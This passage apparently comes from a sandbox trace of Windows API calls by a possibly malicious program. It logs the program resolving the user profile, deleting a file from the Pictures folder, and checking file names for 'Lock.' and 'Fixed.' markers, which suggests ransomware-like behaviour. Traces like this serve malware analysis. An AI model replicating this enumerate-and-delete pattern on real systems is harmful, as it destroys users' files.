(HeapHandle=0x2af0000, Flags=0x0, Size=0x5c) returned 0x2a74f98 [0210.226] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/G_BhwPRnGbbQ-dfc.bmp", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\G_BhwPRnGbbQ-dfc.bmp", lpFilePart=0x8cedf4*="G_BhwPRnGbbQ-dfc.bmp") returned 0x2d [0210.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74f98 | out: hHeap=0x2af0000) returned 1 [0210.226] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\G_BhwPRnGbbQ-dfc.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\g_bhwprngbbq-dfc.bmp")) returned 0x20 [0210.226] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\G_BhwPRnGbbQ-dfc.bmp", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde29fb10, ftCreationTime.dwHighDateTime=0x1d5d490, ftLastAccessTime.dwLowDateTime=0x44d1e970, ftLastAccessTime.dwHighDateTime=0x1d5cb74, ftLastWriteTime.dwLowDateTime=0x44d1e970, ftLastWriteTime.dwHighDateTime=0x1d5cb74, nFileSizeHigh=0x0, nFileSizeLow=0xfe5, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="G_BhwPRnGbbQ-dfc.bmp", cAlternateFileName="G_BHWP~1.BMP")) returned 0x9e1bf8 [0210.226] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\G_BhwPRnGbbQ-dfc.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\g_bhwprngbbq-dfc.bmp")) returned 1 [0210.235] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde29fb10, ftCreationTime.dwHighDateTime=0x1d5d490, ftLastAccessTime.dwLowDateTime=0x44d1e970, ftLastAccessTime.dwHighDateTime=0x1d5cb74, ftLastWriteTime.dwLowDateTime=0x44d1e970, ftLastWriteTime.dwHighDateTime=0x1d5cb74, nFileSizeHigh=0x0, nFileSizeLow=0xfe5, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="G_BhwPRnGbbQ-dfc.bmp", cAlternateFileName="G_BHWP~1.BMP")) returned 0 [0210.235] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0210.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0210.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0210.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.235] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0210.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0210.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0210.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0210.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0210.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0210.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0210.236] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0210.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa750 [0210.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0210.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa720 [0210.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0210.236] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0210.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0210.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0210.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0210.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0210.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0210.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0210.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0210.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0210.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0210.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0210.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0210.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0210.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0210.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0210.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0210.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0210.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0210.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0210.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0210.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0210.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5c) returned 0x2a74ec8 [0210.237] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/G_BhwPRnGbbQ-dfc.bmp", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\G_BhwPRnGbbQ-dfc.bmp", lpFilePart=0x8cf650*="G_BhwPRnGbbQ-dfc.bmp") returned 0x2d [0210.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74ec8 | out: hHeap=0x2af0000) returned 1 [0210.238] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\G_BhwPRnGbbQ-dfc.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\g_bhwprngbbq-dfc.bmp")) returned 0xffffffff [0210.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0210.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0210.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.238] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0210.238] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.238] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0210.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0210.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0210.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0210.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0210.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0210.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0210.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0210.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0210.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H4_H0S0fmbzOF.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4_H0S0fmbzOF.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_H0S0fmbzOF.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H0S0fmbzOF.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0S0fmbzOF.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S0fmbzOF.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0fmbzOF.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fmbzOF.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mbzOF.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bzOF.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zOF.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OF.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0210.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0210.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0210.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0210.239] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0210.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0210.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0210.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0210.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0210.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0210.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0210.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0210.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0210.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0210.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0210.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69a00 [0210.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0210.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H4_H0S0fmbzOF.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4_H0S0fmbzOF.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_H0S0fmbzOF.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H0S0fmbzOF.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0S0fmbzOF.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S0fmbzOF.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0fmbzOF.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fmbzOF.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mbzOF.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bzOF.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zOF.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OF.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6530 [0210.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6530 | out: hHeap=0x2af0000) returned 1 [0210.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0210.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0210.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0210.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0210.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6760 | out: hHeap=0x2af0000) returned 1 [0210.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0210.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0210.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0210.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.241] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0210.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0210.241] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0210.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0210.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b38 [0210.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0210.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0210.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0210.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0210.242] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0210.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5d0 [0210.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6a8 [0210.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0210.242] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0210.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0210.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0210.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0210.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0210.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0210.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.243] HeapFree 